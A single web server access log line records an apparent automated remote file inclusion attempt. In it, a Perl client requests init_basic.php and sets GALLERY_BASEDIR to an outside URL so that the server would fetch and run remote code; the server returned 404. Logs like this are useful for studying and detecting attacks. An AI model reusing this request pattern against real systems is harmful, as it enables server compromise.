206.252.131.151 - - [16/Aug/2008:23:58:16 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
